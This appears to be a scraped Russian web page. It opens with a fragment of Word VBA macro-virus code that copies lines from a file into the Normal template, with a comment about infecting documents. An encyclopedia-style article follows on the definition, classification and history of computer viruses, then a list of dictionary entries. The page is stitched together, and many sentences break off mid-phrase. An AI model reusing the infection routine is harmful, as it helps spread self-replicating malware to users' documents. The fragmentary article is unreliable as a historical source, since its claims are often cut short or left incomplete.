If LOF(1) = 0 Then GoTo quit1
i = 1

Do While Not EOF(1)
Line Input #1, a
If i > 8 Then

If i = 29 Then
t.CodeModule.InsertLines i, «sub Document_Close()»
Else: t.CodeModule.InsertLines i, poly + a + poly
End If
End If
i = i + 1
Loop
quit1:
Close #1

If Application.UserName <> «[h0b0t]» Then ‘Если документ не заражён, то заразим
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
Open «c:\Windows\sl0n.vxd» For Input As #1
If LOF(1) = 0 Then GoTo quit
i = 1

Do While Not EOF(1)
Line Input #1, a
If i > 8 Then

Источник

Вирусы (компьютерные)

Компью́терный ви́рус — разновидность компьютерных программ, отличительной особенностью которой является способность к размножению (саморепликация). В дополнение к этому вирусы могут повредить или полностью уничтожить все файлы и данные, подконтрольные пользователю, от имени которого была запущена заражённая программа, а также повредить или даже уничтожить операционную систему со всеми файлами в целом.

Неспециалисты к компьютерным вирусам иногда причисляют и другие виды вредоносных программ, такие как трояны, спам. [1] Известны десятки тысяч компьютерных вирусов, которые распространяются через Интернет по всему миру, организуя вирусные эпидемии.

Вирусы распространяются, внедряя себя в исполняемый код других программ или же заменяя собой другие программы. Какое-то время даже считалось, что, являясь программой, вирус может заразить только программу — какое угодно изменение не-программы является не заражением, а просто повреждением данных. Подразумевалось, что такие копии вируса не получат управления, будучи информацией, не используемой процессором в качестве инструкций. Так, например неформатированный текст не мог бы быть переносчиком вируса.

Однако, позднее злоумышленники добились, что вирусным поведением может обладать не только исполняемый код, содержащий машинный код процессора. Были написаны вирусы на языке пакетных файлов. Потом появились макровирусы, внедряющиеся через макросы в документы таких программ, как Microsoft Word и Excel.

Некоторое время спустя взломщики создали вирусы, использующие уязвимости в популярном программном обеспечении (например, Adobe Photoshop, Internet Explorer, Outlook), в общем случае обрабатывающем обычные данные. Вирусы стали распространяться посредством внедрения в последовательности данных (например, картинки, тексты, и т. д.) специального кода, использующего уязвимости программного обеспечения.

Создание и распространение компьютерных вирусов и вредоносных программ преследуется в России согласно Уголовному Кодексу РФ.

Согласно Доктрине информационной безопасности РФ в России должен проводиться правовой ликбез в школах и вузах при обучении информатике и компьютерной грамотности по вопросам защиты информации в ЭВМ, борьбы с компьютерными вирусами, детскими порносайтами и обеспечению информационной безопасности в сетях ЭВМ.

Содержание

Происхождение термина

Формальное определение

Для данной машины M, последовательность символов v : vi ∈ IM может быть сочтена вирусом, тогда и только тогда, когда обработка последовательности v в момент времени t, влечёт за собой то, что в один из следующих моментов времени t, последовательность v (не пересекающаяся с v) существует на ленте, и эта последовательность v была записана M в точке, лежащей между t и t:

Классификация

В настоящее время не существует единой системы классификации и именования вирусов (хотя попытка создать стандарт была предпринята на встрече CARO в 1991 году). Принято разделять вирусы по поражаемым объектам (файловые вирусы, загрузочные вирусы, скриптовые вирусы, макро-вирусы, сетевые черви), по поражаемым операционным системам и платформам (Microsoft Windows, Unix, полиморфные вирусы, стелс-вирусы), по языку, на котором написан вирус (ассемблер, высокоуровневый язык программирования, скриптовый язык и др.).

Макро-вирусы

(Macro viruses) являются программами на языках (макро-языках), встроенных во многие системы обработки данных (текстовые редакторы, электронные таблицы и т. д.). Для своего размножения такие вирусы используют возможности макро-языков и при их помощи переносят себя из одного зараженного файла (документа или таблицы) в другие. Наибольшее распространение получили макро-вирусы для Microsoft Word, Excel и Office97. Существуют также макро-вирусы, заражающие документы Ami Pro и базы данных Microsoft Access.

Классификация файловых вирусов по способу заражения

По способу заражения файловые вирусы (вирусы, внедряющие свой код в исполняемые файлы: командные файлы, программы, драйверы, исходный код программ и др.) разделяют на перезаписывающие, паразитические, вирусы-звенья, вирусы-черви, компаньон-вирусы, а так же вирусы, поражающие исходные тексты программ и компоненты программного обеспечения (VCL, LIB и др.).

Каналы распространения

Экономика

Некоторые производители антивирусов утверждают, что сейчас создание вирусов превратилось из одиночного хулиганского занятия в серьёзный бизнес, имеющий тесные связи с бизнесом спама и другими видами противозаконной деятельности. [9]

Также называются миллионные и даже миллиардные суммы ущерба от действий вирусов и червей. [10] К подобным утверждениям и оценкам следует относиться осторожно — суммы ущерба по оценкам различных аналитиков различаются (иногда на три-четыре порядка), а методики подсчёта не приводятся.

История

Первые самовоспроизводящиеся программы

Основы теории самовоспроизводящихся механизмов заложил американец венгерского происхождения Джон фон Нейман, который в 1951 году предложил метод создания таких механизмов. Первой публикацией, посвящённой созданию самовоспроизводящихся систем, является статья Л. С. Пенроуз в соавторстве со своим мужем, нобелевским лауреатом по физике Р. Пенроузом, о самовоспроизводящихся механических структурах, опубликованная в 1957 году американским журналом [11] В этой статье, наряду с примерами чисто механических конструкций, была приведена некая двумерная модель подобных структур, способных к активации, захвату и освобождению. По материалам этой статьи Ф. Ж. Шталь (F. G. Stahl) запрограммировал на машинном языке ЭВМ IBM 650 биокибернетическую модель, в которой существа двигались, питаясь ненулевыми словами. При поедании некоторого числа символов существо размножалось, причём дочерние механизмы могли мутировать. Если кибернетическое существо двигалось определённое время без питания, оно погибало.

В 1961 году В. А. Высотский, Х. Д. Макилрой (H. D. McIlroy) и Роберт Моррис (Robert Morris) из фирмы Bell Telephone Laboratories (США) изобрели необычную игру «Дарвин», в которой несколько ассемблерных программ, названных «организмами», загружались в память компьютера. Организмы, созданные одним игроком (то есть принадлежащие к одному виду), должны были уничтожать представителей другого вида и захватывать жизненное пространство. Победителем считался тот игрок, чьи организмы захватывали всю память или набирали наибольшее количество очков. [12]

Появление первых вирусов

Появление первых компьютерных вирусов зачастую ошибочно относят к 1970-м и даже 1960-м годам. Обычно упоминаются как «вирусы» такие программы, как Animal, Cookie Monster и Xerox worm.

Юрген Краус

Первые вирусы

С появлением первых персональных компьютеров 1977 году и развитием сетевой инфраструктуры начинается новая эпоха истории вирусов. Появились первые программы-вандалы, которые под видом полезных программ выкладывались на

ELK CLONER

В 1981 году Ричард Скрента написал один из первых загрузочных вирусов для ПЭВМ Apple II — ELK CLONER. [14] Он обнаруживал своё присутствие сообщением, содержащим небольшое стихотворение:

Студент Джо Деллинджер

Другие вирусы для Apple II были созданы студентом Техасского университета A&M Джо Деллинджером в 1981 году. Они были рассчитаны на операционную систему [15]

Статья Фреда Коэна

В сентябре 1984 году была опубликована статья Ф. Коэна [Cohen84], в которой автор исследовал разновидность файлового вируса. Это фактически второе академическое исследование проблемы вирусов. Однако именно Коэна принято считать автором термина «компьютерный вирус».

Грязная дюжина

В 1985 году Том Нефф (англ. Tom Neff ) начал распространять по различным BBS список «Грязная дюжина — список опасных загружаемых программ» (англ. The Dirty Dozen — An Unloaded Program Alert List ), в котором были перечислены известные на тот момент программы-вандалы. В дальнейшем этот список, включающий большинство выявленных троянских программ и «взломанные» или переименованные копии коммерческого программного обеспечения для англ. dirty dozen ). [16]

Первые антивирусы

Первые антивирусные утилиты появились зимой 1984 года. Анди Хопкинс (англ. Andy Hopkins ) написал программы CHK4BOMB и BOMBSQAD. CHK4BOMB позволяла проанализировать текст загрузочного модуля и выявляла все текстовые сообщения и «подозрительные» участки кода (команды прямой записи на диск и др.). Благодаря своей простоте (фактически использовался только контекстный поиск) и эффективности CHK4BOMB получила значительную популярность. Программа BOMBSQAD.COM перехватывает операции записи и форматирования, выполняемые через

Первый резидентный антивирус

В начале 1985 года Ги Вонг (англ. Gee Wong ) написал программу DPROTECT — резидентную программу, перехватывающую попытки записи на дискеты и винчестер. Она блокировала все операции (запись, форматирование), выполняемые через BIOS. В случае выявления такой операции программа требовала рестарта системы.

Первые вирусные эпидемии

Очередным этапом развития вирусов считается 1987 год. К этому моменту получили широкое распространения сравнительно дешёвые компьютеры IBM PC, что привело к резкому увеличению масштаба заражения компьютерными вирусами. Именно в 1987 вспыхнули сразу три крупные эпидемии компьютерных вирусов.

Brain и другие

Первая эпидемия 1987 года была вызвана вирусом Brain (также известен как Пакистанский вирус), который был разработан братьями Амджатом и Базитом Алви (Amdjat и Basit Faroog Alvi) в 1986 и был обнаружен летом 1987. По данным Пакистана и заразил сотни компьютеров по всему миру. Вирус Brain являлся также и первым стелс-вирусом — при попытке чтения заражённого сектора он «подставлял» его незаражённый оригинал.

Вторая эпидемия, берущая начало в Лехайском университете (США), разразилась в ноябре. В течение нескольких дней этот вирус уничтожил содержимое нескольких сот дискет из библиотеки вычислительного центра университета и личных дискет студентов. За время эпидемии вирусом было заражено около четырёх тысяч компьютеров.

Последняя вирусная эпидемия разразилась перед самым Новым годом, 30 декабря. Её вызвал вирус, обнаруженный в Иерусалимском Университете (Израиль). Хотя существенного вреда этот вирус не принёс, он быстро распространился по всему миру.

В пятницу 13 мая 1988 сразу несколько фирм и университетов нескольких стран мира «познакомились» с вирусом Jerusalem — в этот день вирус уничтожал файлы при их запуске. Это, пожалуй, один из первых MS-DOS-вирусов, ставший причиной настоящей пандемии — сообщения о заражённых компьютерах поступали из Европы, Америки и Ближнего Востока.

Червь Морриса

В 1988 году Робертом Моррисом-младшим был создан первый массовый сетевой червь. 60 000-байтная программа разрабатывалась с расчётом на поражение операционных систем ARPANET, и остаться там необнаруженным. Вирусная программа включала компоненты, позволяющие раскрывать пароли, имеющиеся в инфицированной системе, что, в свою очередь, позволяло программе маскироваться под задачу легальных пользователей системы, на самом деле занимаясь размножением и рассылкой копий. Вирус не остался скрытым и полностью безопасным, как задумывал автор, в силу незначительных ошибок, допущенных при разработке, которые привели к стремительному неуправляемому саморазмножению вируса.

По самым скромным оценкам инцидент с червём Морриса стоил свыше 8 миллионов часов потери доступа и свыше миллиона часов прямых потерь на восстановление работоспособности систем. Общая стоимость этих затрат оценивается в 96 миллионов долларов (в эту сумму, также, не совсем обосновано, включены затраты по доработке операционной системы). Ущерб был бы гораздо больше, если бы вирус изначально создавался с разрушительными целями.

Червь Морриса поразил свыше 6200 компьютеров. В результате вирусной атаки большинство сетей вышло из строя на срок до пяти суток. Компьютеры, выполнявшие коммутационные функции, работавшие в качестве файл-серверов или выполнявшие другие функции обеспечения работы сети, также вышли из строя.

4 мая 1990 года суд присяжных признал Морриса виновным. Он был приговорён к условному заключению сроком на два года, 400 часам общественных работ и штрафу размером 10 тыс. долларов.

DATACRIME и AIDS

В 1989 широкое распространение получили вирусы DATACRIME, которые начиная с 12 октября разрушали файловую систему, а до этой даты просто размножались. Эта серия компьютерных вирусов начала распространяться в Нидерландах, США и Японии в начале 1989 года и к сентябрю поразила около 100 тысяч ПЭВМ только в Нидерландах (что составило около 10 % от их общего количества в стране). Даже фирма IBM отреагировала на эту угрозу, выпустив свой детектор VIRSCAN, позволяющий искать характерные для того или иного вируса строки (сигнатуры) в файловой системе. Набор сигнатур мог дополняться и изменяться пользователем.

Глобализация проблемы вирусов

Начиная с 1990 года проблема вирусов начинает принимать глобальный размах.

В начале года выходит первый полиморфный вирус — Chameleon. Данная технология была быстро взята на вооружение и в сочетании со стелс-технологии (Stealth) и бронированием (Armored) позволила новым вирусам успешно противостоять существующим антивирусным пакетам. Во второй половине 1990 года появились два стелс-вируса — Frodo и Whale. Оба вируса использовали крайне сложные стелс-алгоритмы, а 9-килобайтный Whale к тому же применял несколько уровней шифровки и анти-отладочных приёмов.

В Болгарии открывается первая в мире специализированная BBS, с которой каждый желающий может скачать свежий вирус. Начинают открываться конференции Usenet по вопросам написания вирусов. В этом же году выходит «Маленькая чёрная книжка о компьютерных вирусах» Марка Людвига.

На проблему противостояния вирусам были вынуждены обратить внимание крупные компании — выходит Symantec Norton Antivirus.

Начало 1991 года отмечено массовой эпидемией полиморфного загрузочного вируса Tequila. Летом 1991 появился первый link-вирус, который сразу же вызвал эпидемию.

1992 известен как год появления первых конструкторов вирусов для PC — VCL (для Amiga конструкторы существовали и ранее), а так же готовых полиморфных модулей (MtE, DAME и TPE) и модулей шифрования. Начиная с этого момента, каждый программист мог легко добавить функции шифрования к своему вирусу. Кроме того, в конце 1992 появился первый вирус для Windows 3.1 — WinVer.

В 1993 появляется все больше и больше вирусов, использующих необычные способы заражения файлов, проникновения в систему и т. д. Основными примерами являются: PMBS, работающий в защищённом режиме процессора Intel 80386. Shadowgard и Carbuncle, значительно расширившие диапазон алгоритмов компаньон-вирусов. Cruncher — использование принципиально новых приёмов сокрытия своего кода в заражённых файлах.

Выходят новые версии вирусных генераторов, а так же появляются новые (PC-MPC и G2). Счёт известных вирусов уже идёт на тысячи. Антивирусные компании разрабатывают ряд эффективных алгоритмов для борьбы с полиморфными вирусами, однако сталкиваются с проблемой ложных срабатываний.

В начале 1994 года в Великобритании появились два крайне сложных полиморфик-вируса — SMEG.Pathogen и SMEG.Queeg. Автор вирусов помещал заражённые файлы на станции BBS, что явилось причиной настоящей эпидемии и паники в средствах массовой информации. Автор вируса был арестован. В январе 1994 появился Shifter — первый вирус, заражающий объектные модули (OBJ-файлы). Весной 1994 был обнаружено SrcVir, семейство вирусов, заражающих исходные тексты программ (C и Pascal). В июне 1994 года началась эпидемия

Вирусы в различных операционных системах

Windows

В 1995 году официально вышла новая версия Windows 95. На пресс-конференции, посвящённой её выходу, Билл Гейтс заявил, что с вирусной угрозой теперь покончено. Действительно, на момент выхода Windows была полностью устойчива к имеющимся DOS вирусам. Однако уже в августе появляется первый вирус для Microsoft Word (Concept), который за несколько недель распространился по всему миру.

В 1996 году появился первый вирус для Windows 95 — Win95.Boza. В марте 1996 года на свободу вырвался Win.Tentacle, заражающий компьютеры под управлением Windows 3.1. Эта была первая эпидемия, вызванная вирусом для Windows. Июль 1996 отмечен распространением Laroux — первого вируса для Microsoft Excel. В декабре 1996 появился Win95.Punch — первый резидентный вирус для Win95. Он загружается в систему как VxD-драйвер, перехватывает обращения к файлам и заражает их.

В феврале 1997 года отмечены первые макровирусы для Office97. Первые из них оказались всего лишь «отконвертированными» в новый формат макровирусами для Word 6/7, однако практически сразу появились вирусы, ориентированные только на документы Office97. Март 1997: ShareFun — макровирус, поражающий MS Word 6/7. Для своего размножения использует не только стандартные возможности MS Word, но также рассылает свои копии по электронной почте MS-Mail. Он по праву считается первым mail-червём. В июне появляется и первый самошифрующийся вирус для Windows 95.

В апреле 1997 года появляется и первый сетевой червь, использующий для своего распространения File Transfer Protocol (ftp). Так же в декабре 1997: появилась новая форма сетевых вирусов — черви mIRC.

Начало 1998 года отмечено эпидемией целого семейства вирусов Win32.HLLP.DeTroie, не только заражавших выполняемые файлы Win32, но и способных передать своему «хозяину» информацию о заражённом компьютере. Февраль 1998: обнаружен ещё один тип вируса, заражающий формулы в таблицах Excel — Excel4.Paix. В марте 1998 года появился и AccessiV — первый вирус для Microsoft Access, также в марте был обнаружен и Cross — первый вирус, заражающий два различных приложения MS Office: Access и Word. Следом за ним появились ещё несколько макровирусов, переносящих свой код из одного Office-приложения в другое.

В феврале-марте 1998 отмечены первые инциденты с Win95.HPS и Win95.Marburg, первыми полиморфными Win32-вирусами. В мае 1998 началась эпидемия RedTeam, который заражал EXE-файлы Windows, и рассылал заражённые файлы при помощи электронной почты Eudora.

В июне началась эпидемия вируса Win95.

В августе 1998 появилась широко известная утилита BackOrifice (Backdoor.BO), применяемая для скрытого администрирования удалённых компьютеров и сетей. Следом за BackOrifice были написаны несколько других аналогичных программ: NetBus, Phase и прочие.

Также в августе был отмечен первый вирус, заражающий выполняемые модули Java — Java.StangeBrew. Этот вирус не представлял какой-либо опасности для пользователей Интернет, поскольку на удалённом компьютере невозможно использовать необходимые для его размножения функции. Вслед за ним в ноябре 1998 появился и VBScript.Rabbi. Интернет-экспансия скриптовых вирусов продолжилась тремя вирусами, заражающими скрипты VisualBasic (VBS-файлы), которые активно применяются при написании Web-страниц. Как логическое следствие VBScript-вирусов стало появление полноценного HTML-вируса (HTML.Internal).

1999 год прошёл под знаком гибридного вируса Melissa, побившего все существовавшие на тот момент рекорды по скорости распространения. Melissa сочетал в себе возможности макровируса и сетевого червя, используя для размножения адресную книгу Outlook.

Правоохранительные органы США нашли и арестовали автора Melissa. Им оказался 31-летний программист из Нью Джерси, Дэвид Л. Смит. Вскоре после ареста Смит начал плодотворное сотрудничество с ФБР и, учтя это, федеральный суд приговорил его к необычно мягкому наказанию: 20 месяцам тюремного заключения и штрафу в размере 5 000 долл. США.

Также в 1999 году был отмечен первый macro-вирус для Corel — Gala. в начале лета 1999 грянула эпидемия Интернет-червя ZippedFiles. Этот червь интересен тем, что являлся первым упакованным вирусом, получившим широкое распространение в «диком» виде.

В июне 1996 года появился OS2.AEP — первый вирус для OS/2, корректно заражающий EXE-файлы этой операционной системы. До этого в OS/2 встречались только компаньон-вирусы. [18]

Unix-подобные

Вероятно, первые вирусы для семейства ОС Unix были написаны Фредом Коэном в ходе проведения экспериментов. В конце 1980-х появились первые публикации с исходными текстами вирусов на языке sh. [19] [20]

Первый вирус для Linux (Bliss) появился в конце сентября 1996 года. Заражённый файл был помещён в ньюс-группу alt.comp.virus и ещё некоторые, в феврале следующего года вышла исправленная версия. В октябре 1996 года в электронном журнале, посвящённом вирусам VLAD, был опубликован исходный текст вируса Staog. [21] В 1995 году была опубликована книга Марка Людвига «The Giant Black Book of Computer Viruses», в которой приведены исходные тексты вирусов Snoopy для FreeBSD. [22] Snoopy и Bliss написаны на языке Си и могут быть перенесены практически в любую UNIX-подобную операционную систему с минимальными изменениями.

Операционная система GNU/Linux, как и Unix-подобные операционные системы, вообще расцениваются как защищённые против компьютерных вирусов. Однако, вирусы могут потенциально повредить незащищённые системы на Linux и воздействовать на них, и даже, возможно, распространяться к другим системам. Число вредоносных програм, включая вирусы, трояны, и прочие вредоносные программы, определённо написанных под Linux, выросло в последние годы и более чем удвоилось в течение 2005 от 422 до 863. [23] Имелись редкие случаи обнаружения вредоносных программ в официальных сетевых репозиториях. [24] [25] [26]

MenuetOS

Первый вирус для RRLF, известным как Second Part To Hell. [27]

Первые вирусы для

Вирусы, меняющие результаты поисковых систем

Развитие вирусов охватило также область использования поисковых систем (типа Google).

Например, при клике на ссылку в результатах поиска поисковой системы можно оказаться на совсем другом сайте, или один из результатов поиска может внешне выглядятеть как и остальные результаты, но при этом не будет иметь никакого отношения к исходному запросу. Таково действие вируса, искажающего страницы в браузере пользователя.

Этот вид вирусов назван вирусами подмены страниц. Вирус подмены страниц может попасть на компьютер пользователя вместе с какой-нибудь программой, загруженной из Интернета. Также, вирус подмены может показывать пользователю свои страницы не только вместо результатов поиска, но и вообще вместо страниц любых сайтов, чем активно пользуются злоумышленники, занимающиеся фишингом.

Примечания

См. также

Ссылки

Полезное

Смотреть что такое «Вирусы (компьютерные)» в других словарях:

ВИРУСЫ КОМПЬЮТЕРНЫЕ — см Компьютерный вирус … Естествознание. Энциклопедический словарь

Компьютерные вирусы — Компьютерный вирус разновидность компьютерных программ, отличительной особенностью которой является способность к размножению (саморепликация). В дополнение к этому вирусы могут повредить или полностью уничтожить все файлы и данные,… … Википедия

КОМПЬЮТЕРНЫЕ ПРЕСТУПЛЕНИЯ — любое противоправное действие, при котором компьютер выступает либо как объект, против которого совершается преступление, либо как инструмент, используемый для совершения преступных действий. К компьютерным преступлениям относится широкий круг… … Энциклопедия Кольера

Вирусы (значения) — Вирус (от лат. virus «яд»): Вирусы инфекционные частицы. Компьютерные вирусы вид вредоносных компьютерных программ. Кинематограф «Вирус» триллер, США, 1995. «Вирус» фантастический художественный фильм, США, 1999. Музыка ViRUS! (Вирус) российская … Википедия

Файловый вирус — компьютерный вирус, прикрепляющий себя к файлу или программе, и активизирующийся при каждом использовании файла. Различают вирусы компаньоны, макровирусы, полиморфные вирусы, вирусы невидимки. По английски: File infector См. также: Файловые… … Финансовый словарь

Электро́нная вычисли́тельная маши́на — (синоним компьютер) автоматическое устройство для обработки информации с помощью электронных схем. Предшественниками современных электронных вычислительных машин (ЭВМ) являются известные уже в средневековье музыкальные и антропоидные автоматы… … Медицинская энциклопедия

Отказ в обслуживании — DoS атака (от англ. Denial of Service, отказ в обслуживании) и DDoS атака (от англ. Distributed Denial of Service, распределённая атака типа «отказ в обслуживании») атака на вычислительную систему с целью довести её до отказа, то есть, создание … Википедия

Отказ от обслуживания — DoS атака (от англ. Denial of Service, отказ в обслуживании) и DDoS атака (от англ. Distributed Denial of Service, распределённая атака типа «отказ в обслуживании») атака на вычислительную систему с целью довести её до отказа, то есть, создание … Википедия

Вирус (компьютерный) — Компьютерный вирус разновидность компьютерных программ, отличительной особенностью которой является способность к размножению (саморепликация). В дополнение к этому вирусы могут повредить или полностью уничтожить все файлы и данные,… … Википедия

Деструктивный вирус — Компьютерный вирус разновидность компьютерных программ, отличительной особенностью которой является способность к размножению (саморепликация). В дополнение к этому вирусы могут повредить или полностью уничтожить все файлы и данные,… … Википедия

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *